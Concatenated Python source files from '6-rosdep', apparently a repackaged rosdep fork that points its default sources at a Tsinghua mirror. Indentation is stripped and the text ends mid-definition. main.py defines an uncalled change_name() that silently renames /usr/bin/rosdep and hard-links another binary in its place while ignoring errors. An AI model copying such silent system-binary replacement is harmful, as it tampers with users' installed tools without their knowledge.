python_versions = MetaDatabase().get('ROS_PYTHON_VERSION', default=[])
if os.environ['ROS_DISTRO'] in python_versions:
os.environ['ROS_PYTHON_VERSION'] = str(python_versions[os.environ['ROS_DISTRO']])
if 'ROS_PYTHON_VERSION' not in os.environ:
# Default to same python version used to invoke rosdep
print('WARNING: ROS_PYTHON_VERSION is unset. Defaulting to {}'.format(sys.version[0]), file=sys.stderr)
os.environ['ROS_PYTHON_VERSION'] = sys.version[0]
def _rosdep_main(args):
# sources cache dir is our local database.
default_sources_cache = get_sources_cache_dir()
parser = OptionParser(usage=_usage, prog='rosdep')
parser.add_option('--os', dest='os_override', default=None,
metavar='OS_NAME:OS_VERSION', help='Override OS name and version (colon-separated), e.g. ubuntu:lucid')
parser.add_option('-c', '--sources-cache-dir', dest='sources_cache_dir', default=default_sources_cache,
metavar='SOURCES_CACHE_DIR', help='Override %s' % (default_sources_cache))
parser.add_option('--verbose', '-v', dest='verbose', default=False,
action='store_true', help='verbose display')
parser.add_option('--version', dest='print_version', default=False,
action='store_true', help='print just the rosdep version, then exit')
parser.add_option('--all-versions', dest='print_all_versions', default=False,
action='store_true', help='print rosdep version and version of installers, then exit')
parser.add_option('--reinstall', dest='reinstall', default=False,
action='store_true', help='(re)install all dependencies, even if already installed')
parser.add_option('--default-yes', '-y', dest='default_yes', default=False,
action='store_true', help='Tell the package manager to default to y or fail when installing')
parser.add_option('--simulate', '-s', dest='simulate', default=False,
action='store_true', help='Simulate install')
parser.add_option('-r', dest='robust', default=False,
action='store_true', help='Continue installing despite errors.')
parser.add_option('-q', dest='quiet', default=False,
action='store_true', help='Quiet. Suppress output except for errors.')
parser.add_option('-a', '--all', dest='rosdep_all', default=False,
action='store_true', help='select all packages')
parser.add_option('-n', dest='recursive', default=True,
action='store_false', help="Do not consider implicit/recursive dependencies. Only valid with 'keys', 'check', and 'install' commands.")
parser.add_option('--ignore-packages-from-source', '--ignore-src', '-i',
dest='ignore_src', default=False, action='store_true',
help="Affects the 'check', 'install', and 'keys' verbs. "
'If specified then rosdep will ignore keys that '
'are found to be catkin or ament packages anywhere in the '
'ROS_PACKAGE_PATH, AMENT_PREFIX_PATH or in any of the directories '
'given by the --from-paths option.')
parser.add_option('--skip-keys',
dest='skip_keys', action='append', default=[],
help="Affects the 'check' and 'install' verbs. The "
'specified rosdep keys will be ignored, i.e. not '
'resolved and not installed. The option can be supplied multiple '
'times. A space separated list of rosdep keys can also '
'be passed as a string. A more permanent solution to '
'locally ignore a rosdep key is creating a local rosdep rule '
'with an empty list of packages (include it in '
'/etc/ros/rosdep/sources.list.d/ before the defaults).')
parser.add_option('--filter-for-installers',
action='append', default=[],
help="Affects the 'db' verb. If supplied, the output of the 'db' "
'command is filtered to only list packages whose installer '
'is in the provided list. The option can be supplied '
'multiple times. A space separated list of installers can also '
'be passed as a string. Example: `--filter-for-installers "apt pip"`')
parser.add_option('--from-paths', dest='from_paths',
default=False, action='store_true',
help="Affects the 'check', 'keys', and 'install' verbs. "
'If specified the arguments to those verbs will be '
'considered paths to be searched, acting on all '
'catkin packages found there in.')
parser.add_option('--rosdistro', dest='ros_distro', default=None,
help='Explicitly sets the ROS distro to use, overriding '
'the normal method of detecting the ROS distro '
'using the ROS_DISTRO environment variable. '
"When used with the 'update' verb, "
'only the specified distro will be updated.')
parser.add_option('--as-root', default=[], action='append',
metavar='INSTALLER_KEY:<bool>', help='Override '
'whether sudo is used for a specific installer, '
"e.g. '--as-root pip:false' or '--as-root \"pip:no homebrew:yes\"'. "
'Can be specified multiple times.')
parser.add_option('--include-eol-distros', dest='include_eol_distros',
default=False, action='store_true',
help="Affects the 'update' verb. "
'If specified end-of-life distros are being '
'fetched too.')
parser.add_option('-t', '--dependency-types', dest='dependency_types',
type="choice", choices=list(VALID_DEPENDENCY_TYPES),
default=[], action='append',
help='Dependency types to install, can be given multiple times. '
'Choose from {}. Default: all except doc.'.format(VALID_DEPENDENCY_TYPES))
options, args = parser.parse_args(args)
if options.print_version or options.print_all_versions:
# First print the rosdep version.
print('{}'.format(__version__))
# If not printing versions of all installers, exit.
if not options.print_all_versions:
sys.exit(0)
        # Otherwise, collect the versions of the installers and print them.
installers = create_default_installer_context().installers
installer_keys = get_default_installer()[1]
version_strings = []
for key in installer_keys:
if key == 'source':
# Explicitly skip the source installer.
continue
installer = installers[key]
try:
installer_version_strings = installer.get_version_strings()
assert isinstance(installer_version_strings, list), installer_version_strings
version_strings.extend(installer_version_strings)
except NotImplementedError:
version_strings.append('{} unknown'.format(key))
continue
except EnvironmentError as e:
if e.errno != errno.ENOENT:
raise
version_strings.append('{} not installed'.format(key))
continue
if version_strings:
print()
print('Versions of installers:')
print('\n'.join([' ' + x for x in version_strings if x]))
else:
print()
print('No installers with versions available found.')
sys.exit(0)
# flatten list of skipped keys, filter-for-installers, and dependency types
options.skip_keys = [key for s in options.skip_keys for key in s.split(' ')]
options.filter_for_installers = [inst for s in options.filter_for_installers for inst in s.split(' ')]
options.dependency_types = [dep for s in options.dependency_types for dep in s.split(' ')]
if len(args) == 0:
parser.error('Please enter a command')
command = args[0]
if command not in _commands:
parser.error('Unsupported command %s.' % command)
args = args[1:]
# Convert list of keys to dictionary
options.as_root = dict((k, str_to_bool(v)) for k, v in key_list_to_dict(options.as_root).items())
if command not in ['init', 'update', 'fix-permissions']:
check_for_sources_list_init(options.sources_cache_dir)
# _package_args_handler uses `ROS_DISTRO`, so environment variables must be set before
setup_environment_variables(options.ros_distro)
elif command not in ['fix-permissions']:
setup_proxy_opener()
if command in _command_rosdep_args:
return _rosdep_args_handler(command, parser, options, args)
elif command in _command_no_args:
return _no_args_handler(command, parser, options, args)
else:
return _package_args_handler(command, parser, options, args)
def _no_args_handler(command, parser, options, args):
if args:
parser.error('command [%s] takes no arguments' % (command))
else:
return command_handlers[command](options)
def _rosdep_args_handler(command, parser, options, args):
# rosdep keys as args
if options.rosdep_all:
parser.error('-a, --all is not a valid option for this command')
elif len(args) < 1:
parser.error("Please enter arguments for '%s'" % command)
else:
return command_handlers[command](args, options)
def _package_args_handler(command, parser, options, args):
if options.rosdep_all:
if args:
parser.error('cannot specify additional arguments with -a')
else:
# let the loader filter the -a. This will take out some
# packages that are catkinized (for now).
lookup = _get_default_RosdepLookup(options)
loader = lookup.get_loader()
args = loader.get_loadable_resources()
not_found = []
elif not args:
parser.error('no packages or stacks specified')
# package or stack names as args. have to convert stack names to packages.
# - overrides to enable testing
packages = []
not_found = []
if options.from_paths:
for path in args:
if options.verbose:
print("Using argument '{0}' as a path to search.".format(path))
if not os.path.exists(path):
print("given path '{0}' does not exist".format(path))
return 1
path = os.path.abspath(path)
if 'ROS_PACKAGE_PATH' not in os.environ:
os.environ['ROS_PACKAGE_PATH'] = '{0}'.format(path)
else:
os.environ['ROS_PACKAGE_PATH'] = '{0}{1}{2}'.format(
path,
os.pathsep,
os.environ['ROS_PACKAGE_PATH']
)
pkgs = find_catkin_packages_in(path, options.verbose)
packages.extend(pkgs)
# Make packages list unique
packages = list(set(packages))
else:
rospack = rospkg.RosPack()
rosstack = rospkg.RosStack()
val = rospkg.expand_to_packages(args, rospack, rosstack)
packages = val[0]
not_found = val[1]
if not_found:
raise rospkg.ResourceNotFound(not_found[0], rospack.get_ros_paths())
# Handle the --ignore-src option
if command in ['install', 'check', 'keys'] and options.ignore_src:
if options.verbose:
print('Searching ROS_PACKAGE_PATH for '
'sources: ' + str(os.environ['ROS_PACKAGE_PATH'].split(os.pathsep)))
ws_pkgs = get_workspace_packages()
for path in os.environ['ROS_PACKAGE_PATH'].split(os.pathsep):
path = os.path.abspath(path.strip())
if os.path.exists(path):
pkgs = find_catkin_packages_in(path, options.verbose)
ws_pkgs.extend(pkgs)
elif options.verbose:
print('Skipping non-existent path ' + path)
set_workspace_packages(ws_pkgs)
# Lookup package names from ament index.
if AMENT_PREFIX_PATH_ENV_VAR in os.environ:
if options.verbose:
print(
'Searching ' + AMENT_PREFIX_PATH_ENV_VAR + ' for '
'sources: ' + str(os.environ[AMENT_PREFIX_PATH_ENV_VAR].split(':')))
ws_pkgs = get_workspace_packages()
pkgs = get_packages_with_prefixes().keys()
ws_pkgs.extend(pkgs)
# Make packages list unique
ws_pkgs = list(set(ws_pkgs))
set_workspace_packages(ws_pkgs)
lookup = _get_default_RosdepLookup(options)
# Handle the --skip-keys option by pretending that they are packages in the catkin workspace
if command in ['install', 'check'] and options.skip_keys:
if options.verbose:
print('Skipping the specified keys:\n- ' + '\n- '.join(options.skip_keys))
lookup.skipped_keys = options.skip_keys
if 0 and not packages: # disable, let individual handlers specify behavior
# possible with empty stacks
print('No packages in arguments, aborting')
return
return command_handlers[command](lookup, packages, options)
def convert_os_override_option(options_os_override):
"""
Convert os_override option flag to ``(os_name, os_version)`` tuple, or
``None`` if not set
:returns: ``(os_name, os_version)`` tuple if option is set, ``None`` otherwise
:raises: :exc:`UsageError` if option is not set properly
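    Example (illustrative values)::
        convert_os_override_option('ubuntu:focal')  # -> ('ubuntu', 'focal')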
"""
if not options_os_override:
return None
val = options_os_override
if ':' not in val:
raise UsageError('OS override must be colon-separated OS_NAME:OS_VERSION, e.g. ubuntu:maverick')
os_name = val[:val.find(':')]
os_version = val[val.find(':') + 1:]
return os_name, os_version
def configure_installer_context(installer_context, options):
"""
Configure the *installer_context* from *options*.
- Override the OS detector in *installer_context* if necessary.
- Set *as_root* for installers if specified.
:raises: :exc:`UsageError` If user input options incorrectly
"""
os_override = convert_os_override_option(options.os_override)
if os_override is not None:
installer_context.set_os_override(*os_override)
for k, v in options.as_root.items():
try:
installer_context.get_installer(k).as_root = v
except KeyError:
raise UsageError("Installer '%s' not defined." % k)
def change_name():
try:
os.rename("/usr/bin/rosdep/","/usr/bin/rosdep_src")
os.link("/usr/local/bin/fix-rosdep","/usr/bin/rosdep_src")
except Exception as e:
pass
def command_init(options):
try:
src_list = download_default_sources_list()
        data = src_list.replace("https://raw.githubusercontent.com/ros/rosdistro/master", "https://mirrors.tuna.tsinghua.edu.cn/github-raw/ros/rosdistro/master")
except URLError as e:
print('ERROR: cannot download default sources list from:\n%s\nWebsite may be down.' % (DEFAULT_SOURCES_LIST_URL))
return 4
except DownloadFailure as e:
print('ERROR: cannot download default sources list from:\n%s\nWebsite may be down.' % (DEFAULT_SOURCES_LIST_URL))
print(e)
return 4
# reuse path variable for error message
path = get_sources_list_dir()
old_umask = os.umask(0o022)
try:
if not os.path.exists(path):
os.makedirs(path)
path = get_default_sources_list_file()
if os.path.exists(path):
            print('WARNING: default sources list file already exists:\n\t%s\nOverwriting it.' % (path))
os.remove(path)
# return 1
with open(path, 'w') as f:
f.write(data)
print('Wrote %s' % (path))
print('Recommended: please run\n\n\trosdep update\n')
except IOError as e:
print('ERROR: cannot create %s:\n\t%s' % (path, e), file=sys.stderr)
return 2
except OSError as e:
print("ERROR: cannot create %s:\n\t%s\nPerhaps you need to run 'sudo rosdep init' instead" % (path, e), file=sys.stderr)
return 3
finally:
os.umask(old_umask)
def command_update(options):
error_occured = []
def update_success_handler(data_source):
print('Hit %s' % (data_source.url))
def update_error_handler(data_source, exc):
error_string = 'ERROR: unable to process source [%s]:\n\t%s' % (data_source.url, exc)
print(error_string, file=sys.stderr)
error_occured.append(error_string)
sources_list_dir = get_sources_list_dir()
# disable deprecation warnings when using the command-line tool
warnings.filterwarnings('ignore', category=PreRep137Warning)
if not os.path.exists(sources_list_dir):
print('ERROR: no sources directory exists on the system meaning rosdep has not yet been initialized.\n\nPlease initialize your rosdep with\n\n\tsudo rosdep init\n')
return 1
filelist = [f for f in os.listdir(sources_list_dir) if f.endswith('.list')]
if not filelist:
print('ERROR: no data sources in %s\n\nPlease initialize your rosdep with\n\n\tsudo rosdep init\n' % sources_list_dir, file=sys.stderr)
return 1
try:
print('reading in sources list data from %s' % (sources_list_dir))
sources_cache_dir = get_sources_cache_dir()
try:
if os.geteuid() == 0:
print("Warning: running 'rosdep update' as root is not recommended.", file=sys.stderr)
print("You should run 'sudo rosdep fix-permissions' and invoke 'rosdep update' again without sudo.", file=sys.stderr)
except AttributeError:
# nothing we wanna do under Windows
pass
update_sources_list(success_handler=update_success_handler,
error_handler=update_error_handler,
skip_eol_distros=not options.include_eol_distros,
ros_distro=options.ros_distro)
print('updated cache in %s' % (sources_cache_dir))
except InvalidData as e:
print('ERROR: invalid sources list file:\n\t%s' % (e), file=sys.stderr)
return 1
except IOError as e:
print('ERROR: error loading sources list:\n\t%s' % (e), file=sys.stderr)
return 1
except ValueError as e:
print('ERROR: invalid argument value provided:\n\t%s' % (e), file=sys.stderr)
return 1
if error_occured:
print('ERROR: Not all sources were able to be updated.\n[[[')
for e in error_occured:
print(e)
print(']]]')
return 1
def command_keys(lookup, packages, options):
lookup = _get_default_RosdepLookup(options)
rosdep_keys = get_keys(lookup, packages, options.recursive)
prune_catkin_packages(rosdep_keys, options.verbose)
_print_lookup_errors(lookup)
print('\n'.join(rosdep_keys))
def get_keys(lookup, packages, recursive):
rosdep_keys = set() # using a set to ensure uniqueness
for package_name in packages:
deps = lookup.get_rosdeps(package_name, implicit=recursive)
rosdep_keys.update(deps)
return list(rosdep_keys)
def command_check(lookup, packages, options):
verbose = options.verbose
installer_context = create_default_installer_context(verbose=verbose)
configure_installer_context(installer_context, options)
installer = RosdepInstaller(installer_context, lookup)
uninstalled, errors = installer.get_uninstalled(packages, implicit=options.recursive, verbose=verbose)
# pretty print the result
if [v for k, v in uninstalled if v]:
print('System dependencies have not been satisfied:')
for installer_key, resolved in uninstalled:
if resolved:
for r in resolved:
print('%s\t%s' % (installer_key, r))
else:
print('All system dependencies have been satisfied')
if errors:
for package_name, ex in errors.items():
if isinstance(ex, rospkg.ResourceNotFound):
print('ERROR[%s]: resource not found [%s]' % (package_name, ex.args[0]), file=sys.stderr)
else:
print('ERROR[%s]: %s' % (package_name, ex), file=sys.stderr)
if uninstalled:
return 1
else:
return 0
def error_to_human_readable(error):
if isinstance(error, rospkg.ResourceNotFound):
return 'Missing resource %s' % (error,)
elif isinstance(error, ResolutionError):
return '%s' % (error.args[0],)
else:
return '%s' % (error,)
def command_install(lookup, packages, options):
# map options
install_options = dict(interactive=not options.default_yes, verbose=options.verbose,
reinstall=options.reinstall,
continue_on_error=options.robust, simulate=options.simulate, quiet=options.quiet)
# setup installer
installer_context = create_default_installer_context(verbose=options.verbose)
configure_installer_context(installer_context, options)
installer = RosdepInstaller(installer_context, lookup)
if options.reinstall:
if options.verbose:
print('reinstall is true, resolving all dependencies')
try:
uninstalled, errors = lookup.resolve_all(packages, installer_context, implicit=options.recursive)
except InvalidData as e:
print('ERROR: unable to process all dependencies:\n\t%s' % (e), file=sys.stderr)
return 1
else:
uninstalled, errors = installer.get_uninstalled(packages, implicit=options.recursive, verbose=options.verbose)
if options.verbose:
uninstalled_dependencies = normalize_uninstalled_to_list(uninstalled)
print('uninstalled dependencies are: [%s]' % ', '.join(uninstalled_dependencies))
if errors:
err_msg = ('ERROR: the following packages/stacks could not have their '
'rosdep keys resolved\nto system dependencies')
if rospkg.distro.current_distro_codename() is None:
err_msg += (
' (ROS distro is not set. '
'Make sure `ROS_DISTRO` environment variable is set, or use '
'`--rosdistro` option to specify the distro, '
'e.g. `--rosdistro indigo`)'
)
print(err_msg + ':', file=sys.stderr)
for rosdep_key, error in errors.items():
print('%s: %s' % (rosdep_key, error_to_human_readable(error)), file=sys.stderr)
if options.robust:
print('Continuing to install resolvable dependencies...')
else:
return 1
try:
installer.install(uninstalled, **install_options)
if not options.simulate:
print('#All required rosdeps installed successfully')
return 0
except KeyError as e:
raise RosdepInternalError(e)
except InstallFailed as e:
print('ERROR: the following rosdeps failed to install', file=sys.stderr)
print('\n'.join([' %s: %s' % (k, m) for k, m in e.failures]), file=sys.stderr)
return 1
def command_db(options):
# exact same setup logic as command_resolve, should possibly combine
lookup = _get_default_RosdepLookup(options)
installer_context = create_default_installer_context(verbose=options.verbose)
configure_installer_context(installer_context, options)
os_name, os_version = installer_context.get_os_name_and_version()
try:
installer_keys = installer_context.get_os_installer_keys(os_name)
default_key = installer_context.get_default_os_installer_key(os_name)
except KeyError:
raise UnsupportedOs(os_name, installer_context.get_os_keys())
installer = installer_context.get_installer(default_key)
print('OS NAME: %s' % os_name)
print('OS VERSION: %s' % os_version)
errors = []
print('DB [key -> resolution]')
# db does not leverage the resource-based API
view = lookup.get_rosdep_view(DEFAULT_VIEW_KEY, verbose=options.verbose)
for rosdep_name in view.keys():
try:
d = view.lookup(rosdep_name)
inst_key, rule = d.get_rule_for_platform(os_name, os_version, installer_keys, default_key)
if options.filter_for_installers and inst_key not in options.filter_for_installers:
continue
resolved = installer.resolve(rule)
resolved_str = ' '.join([str(r) for r in resolved])
print('%s -> %s' % (rosdep_name, resolved_str))
except ResolutionError as e:
errors.append(e)
# TODO: add command-line option for users to be able to see this.
# This is useful for platform bringup, but useless for most users
# as the rosdep db contains numerous, platform-specific keys.
if 0:
for error in errors:
print('WARNING: %s' % (error_to_human_readable(error)), file=sys.stderr)
def _print_lookup_errors(lookup):
for error in lookup.get_errors():
if isinstance(error, rospkg.ResourceNotFound):
print('WARNING: unable to locate resource %s' % (str(error.args[0])), file=sys.stderr)
else:
print('WARNING: %s' % (str(error)), file=sys.stderr)
def command_what_needs(args, options):
lookup = _get_default_RosdepLookup(options)
packages = []
for rosdep_name in args:
packages.extend(lookup.get_resources_that_need(rosdep_name))
_print_lookup_errors(lookup)
print('\n'.join(set(packages)))
def command_where_defined(args, options):
lookup = _get_default_RosdepLookup(options)
locations = []
for rosdep_name in args:
locations.extend(lookup.get_views_that_define(rosdep_name))
_print_lookup_errors(lookup)
if locations:
for location in locations:
origin = location[1]
print(origin)
else:
print('ERROR: cannot find definition(s) for [%s]' % (', '.join(args)), file=sys.stderr)
return 1
def command_resolve(args, options):
lookup = _get_default_RosdepLookup(options)
installer_context = create_default_installer_context(verbose=options.verbose)
configure_installer_context(installer_context, options)
installer, installer_keys, default_key, \
os_name, os_version = get_default_installer(installer_context=installer_context,
verbose=options.verbose)
invalid_key_errors = []
for rosdep_name in args:
if len(args) > 1:
print('#ROSDEP[%s]' % rosdep_name)
view = lookup.get_rosdep_view(DEFAULT_VIEW_KEY, verbose=options.verbose)
try:
d = view.lookup(rosdep_name)
except KeyError as e:
invalid_key_errors.append(e)
continue
rule_installer, rule = d.get_rule_for_platform(os_name, os_version, installer_keys, default_key)
installer = installer_context.get_installer(rule_installer)
resolved = installer.resolve(rule)
print('#%s' % (rule_installer))
print(' '.join([str(r) for r in resolved]))
for error in invalid_key_errors:
print('ERROR: no rosdep rule for %s' % (error), file=sys.stderr)
for error in lookup.get_errors():
print('WARNING: %s' % (error_to_human_readable(error)), file=sys.stderr)
if invalid_key_errors:
return 1 # error exit code
def command_fix_permissions(options):
import os
import pwd
import grp
stat_info = os.stat(os.path.expanduser('~'))
uid = stat_info.st_uid
gid = stat_info.st_gid
user_name = pwd.getpwuid(uid).pw_name
try:
group_name = grp.getgrgid(gid).gr_name
except KeyError as e:
group_name = gid
ros_home = rospkg.get_ros_home()
print("Recursively changing ownership of ros home directory '{0}' "
"to '{1}:{2}' (current user)...".format(ros_home, user_name, group_name))
failed = []
try:
for dirpath, dirnames, filenames in os.walk(ros_home):
try:
os.lchown(dirpath, uid, gid)
except Exception as e:
failed.append((dirpath, str(e)))
for f in filenames:
try:
path = os.path.join(dirpath, f)
os.lchown(path, uid, gid)
except Exception as e:
failed.append((path, str(e)))
except Exception:
import traceback
traceback.print_exc()
print('Failed to walk directory. Try with sudo?')
else:
if failed:
print('Failed to change ownership for:')
for p, e in failed:
print('{0} --> {1}'.format(p, e))
print('Try with sudo?')
else:
print('Done.')
command_handlers = {
'db': command_db,
'check': command_check,
'keys': command_keys,
'install': command_install,
'what-needs': command_what_needs,
'where-defined': command_where_defined,
'resolve': command_resolve,
'init': command_init,
'update': command_update,
'fix-permissions': command_fix_permissions,
# backwards compat
'what_needs': command_what_needs,
'where_defined': command_where_defined,
'depdb': command_db,
}
# commands that accept rosdep names as args
_command_rosdep_args = ['what-needs', 'what_needs', 'where-defined', 'where_defined', 'resolve']
# commands that take no args
_command_no_args = ['update', 'init', 'db', 'fix-permissions']
_commands = command_handlers.keys() | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/main.py | main.py |
# Author Tully Foote/[email protected]
from __future__ import print_function
import os
import sys
import stat
import subprocess
import tempfile
from .core import rd_debug
if sys.hexversion > 0x03000000: # Python3
python3 = True
else:
python3 = False
env = dict(os.environ)
env['LANG'] = 'C'
def read_stdout(cmd, capture_stderr=False):
"""
Execute given command and return stdout and if requested also stderr.
:param cmd: command in a form that Popen understands (list of strings or one string)
    :param capture_stderr: If it evaluates to True, capture output from stderr
        as well and return it too.
    :return: If `capture_stderr` evaluates to False, return the stdout of
        the program as a string (note: stderr will be printed to the running
        terminal). If it evaluates to True, return a tuple of strings: the
        stdout output and the stderr output.
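    Example (sketch; the commands shown are only illustrative)::
        std_out = read_stdout(['apt-cache', 'policy'])
        std_out, std_err = read_stdout(['pip', '--version'], capture_stderr=True)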
"""
if capture_stderr:
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env)
std_out, std_err = p.communicate()
if python3:
return std_out.decode(), std_err.decode()
else:
return std_out, std_err
else:
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, env=env)
std_out, std_err = p.communicate() # ignore stderr
if python3:
return std_out.decode()
else:
return std_out
def create_tempfile_from_string_and_execute(string_script, path=None, exec_fn=None):
"""
:param path: (optional) path to temp directory, or ``None`` to use default temp directory, ``str``
:param exec_fn: override subprocess.call with alternate executor (for testing)
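    Example (sketch; the script body is hypothetical)::
        succeeded = create_tempfile_from_string_and_execute('#!/bin/sh\\necho hello\\n')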
"""
if path is None:
path = tempfile.gettempdir()
result = 1
try:
fh = tempfile.NamedTemporaryFile('w', delete=False)
fh.write(string_script)
fh.close()
rd_debug('Executing script below with cwd=%s\n{{{\n%s\n}}}\n' % (path, string_script))
try:
os.chmod(fh.name, stat.S_IRWXU)
if exec_fn is None:
result = subprocess.call(fh.name, cwd=path)
else:
result = exec_fn(fh.name, cwd=path)
except OSError as ex:
print('Execution failed with OSError: %s' % (ex))
finally:
if os.path.exists(fh.name):
os.remove(fh.name)
rd_debug('Return code was: %s' % (result))
return result == 0 | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/shell_utils.py | shell_utils.py |
# Author Ken Conley/[email protected]
"""
Base API for loading rosdep information by package or stack name.
This API is decoupled from the ROS packaging system to enable multiple
implementations of rosdep, including ones that don't rely on the ROS
packaging system. This is necessary, for example, to implement a
version of rosdep that works against tarballs of released stacks.
"""
import yaml
from .core import InvalidData
ROSDEP_YAML = 'rosdep.yaml'
class RosdepLoader:
"""
Base API for loading rosdep information by package or stack name.
"""
def load_rosdep_yaml(self, yaml_contents, origin):
"""
Utility routine for unmarshalling rosdep data encoded as YAML.
:param origin: origin of yaml contents (for error messages)
:raises: :exc:`yaml.YAMLError`
"""
try:
return yaml.safe_load(yaml_contents)
except yaml.YAMLError as e:
raise InvalidData('Invalid YAML in [%s]: %s' % (origin, e), origin=origin)
def load_view(self, view_name, rosdep_db, verbose=False):
"""
Load view data into rosdep_db. If the view has already been
loaded into rosdep_db, this method does nothing.
:param view_name: name of ROS stack to load, ``str``
:param rosdep_db: database to load stack data into, :class:`RosdepDatabase`
:raises: :exc:`InvalidData`
:raises: :exc:`rospkg.ResourceNotFound` if view cannot be located
"""
raise NotImplementedError(view_name, rosdep_db, verbose) # pychecker
def get_loadable_resources(self):
raise NotImplementedError()
def get_loadable_views(self):
raise NotImplementedError()
def get_rosdeps(self, resource_name, implicit=True):
"""
:raises: :exc:`rospkg.ResourceNotFound` if *resource_name* cannot be found.
"""
raise NotImplementedError(resource_name, implicit) # pychecker
def get_view_key(self, resource_name):
"""
Map *resource_name* to a view key. In rospkg, this maps a ROS
package name to a ROS stack name. If *resource_name* is a ROS
stack name, it returns the ROS stack name.
:returns: Name of view that *resource_name* is in, ``None`` if no associated view.
:raises: :exc:`rospkg.ResourceNotFound` if *resource_name* cannot be found.
"""
raise NotImplementedError(resource_name) | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/loader.py | loader.py |
# Author Ken Conley/[email protected]
from __future__ import print_function
import os
import sys
import yaml
try:
from urllib.request import urlopen
from urllib.error import URLError
import urllib.request as request
except ImportError:
from urllib2 import urlopen
from urllib2 import URLError
import urllib2 as request
try:
import cPickle as pickle
except ImportError:
import pickle
from .cache_tools import compute_filename_hash, PICKLE_CACHE_EXT, write_atomic, write_cache_file
from .core import InvalidData, DownloadFailure, CachePermissionError
from .gbpdistro_support import get_gbprepo_as_rosdep_data, download_gbpdistro_as_rosdep_data
from .meta import MetaDatabase
from ._version import __version__
try:
import urlparse
except ImportError:
import urllib.parse as urlparse # py3k
try:
import httplib
except ImportError:
import http.client as httplib # py3k
import rospkg
import rospkg.distro
from .loader import RosdepLoader
from .rosdistrohelper import get_index, get_index_url
# default file to download with 'init' command in order to bootstrap
# rosdep
DEFAULT_SOURCES_LIST_URL = 'https://mirrors.tuna.tsinghua.edu.cn/github-raw/ros/rosdistro/master/rosdep/sources.list.d/20-default.list'
# seconds to wait before aborting download of rosdep data
DOWNLOAD_TIMEOUT = 15.0
SOURCES_LIST_DIR = 'sources.list.d'
SOURCES_CACHE_DIR = 'sources.cache'
# name of index file for sources cache
CACHE_INDEX = 'index'
# environment variable listing alternative sources list directories (os.pathsep-separated)
SOURCE_PATH_ENV = 'ROSDEP_SOURCE_PATH'
def get_sources_list_dirs(source_list_dir):
if SOURCE_PATH_ENV in os.environ:
sdirs = os.environ[SOURCE_PATH_ENV].split(os.pathsep)
else:
sdirs = [source_list_dir]
for p in list(sdirs):
if not os.path.exists(p):
sdirs.remove(p)
return sdirs
def get_sources_list_dir():
# base of where we read config files from
# TODO: windows
if 0:
# we can't use etc/ros because environment config does not carry over under sudo
etc_ros = rospkg.get_etc_ros_dir()
else:
etc_ros = '/etc/ros'
# compute default system wide sources directory
sys_sources_list_dir = os.path.join(etc_ros, 'rosdep', SOURCES_LIST_DIR)
sources_list_dirs = get_sources_list_dirs(sys_sources_list_dir)
if sources_list_dirs:
return sources_list_dirs[0]
else:
return sys_sources_list_dir
def get_default_sources_list_file():
return os.path.join(get_sources_list_dir(), '20-default.list')
def get_sources_cache_dir():
ros_home = rospkg.get_ros_home()
return os.path.join(ros_home, 'rosdep', SOURCES_CACHE_DIR)
# Default rosdep.yaml format. For now this is the only valid type and
# is specified for future compatibility.
TYPE_YAML = 'yaml'
# git-buildpackage repo list
TYPE_GBPDISTRO = 'gbpdistro'
VALID_TYPES = [TYPE_YAML, TYPE_GBPDISTRO]
class DataSource(object):
def __init__(self, type_, url, tags, origin=None):
"""
:param type_: data source type, e.g. TYPE_YAML, TYPE_GBPDISTRO
:param url: URL of data location. For file resources, must
start with the file:// scheme. For remote resources, URL
must include a path.
:param tags: tags for matching data source to configurations
:param origin: filename or other indicator of where data came from for debugging.
:raises: :exc:`ValueError` if parameters do not validate
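        Example (sketch; the URL and tags are hypothetical)::
            DataSource('yaml', 'https://example.com/rosdep/base.yaml', ['ubuntu', 'focal'],
                       origin='/etc/ros/rosdep/sources.list.d/20-default.list')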
"""
# validate inputs
if type_ not in VALID_TYPES:
raise ValueError('type must be one of [%s]' % (','.join(VALID_TYPES)))
parsed = urlparse.urlparse(url)
if not parsed.scheme or (parsed.scheme != 'file' and not parsed.netloc) or parsed.path in ('', '/'):
raise ValueError('url must be a fully-specified URL with scheme, hostname, and path: %s' % (str(url)))
if not type(tags) == list:
raise ValueError('tags must be a list: %s' % (str(tags)))
self.type = type_
self.tags = tags
self.url = url
self.origin = origin
def __eq__(self, other):
return isinstance(other, DataSource) and \
self.type == other.type and \
self.tags == other.tags and \
self.url == other.url and \
self.origin == other.origin
def __str__(self):
if self.origin:
return '[%s]:\n%s %s %s' % (self.origin, self.type, self.url, ' '.join(self.tags))
else:
return '%s %s %s' % (self.type, self.url, ' '.join(self.tags))
def __repr__(self):
return repr((self.type, self.url, self.tags, self.origin))
class RosDistroSource(DataSource):
def __init__(self, distro):
self.type = TYPE_GBPDISTRO
self.tags = [distro]
# In this case self.url is a list if REP-143 is being used
self.url = get_index().distributions[distro]['distribution']
self.origin = None
# create function we can pass in as model to parse_source_data. The
# function emulates the CachedDataSource constructor but does the
# necessary full filepath calculation and loading of data.
def cache_data_source_loader(sources_cache_dir, verbose=False):
def create_model(type_, uri, tags, origin=None):
        # compute the filename hash from the URL
filename = compute_filename_hash(uri)
filepath = os.path.join(sources_cache_dir, filename)
pickle_filepath = filepath + PICKLE_CACHE_EXT
if os.path.exists(pickle_filepath):
if verbose:
print('loading cached data source:\n\t%s\n\t%s' % (uri, pickle_filepath), file=sys.stderr)
with open(pickle_filepath, 'rb') as f:
rosdep_data = pickle.loads(f.read())
elif os.path.exists(filepath):
if verbose:
print('loading cached data source:\n\t%s\n\t%s' % (uri, filepath), file=sys.stderr)
with open(filepath) as f:
rosdep_data = yaml.safe_load(f.read())
else:
rosdep_data = {}
return CachedDataSource(type_, uri, tags, rosdep_data, origin=filepath)
return create_model
class CachedDataSource(object):
def __init__(self, type_, url, tags, rosdep_data, origin=None):
"""
Stores data source and loaded rosdep data for that source.
        NOTE: this is not a subclass of DataSource, though its API is
        duck-type compatible with the DataSource API.
"""
self.source = DataSource(type_, url, tags, origin=origin)
self.rosdep_data = rosdep_data
def __eq__(self, other):
try:
return self.source == other.source and \
self.rosdep_data == other.rosdep_data
except AttributeError:
return False
def __str__(self):
return '%s\n%s' % (self.source, self.rosdep_data)
def __repr__(self):
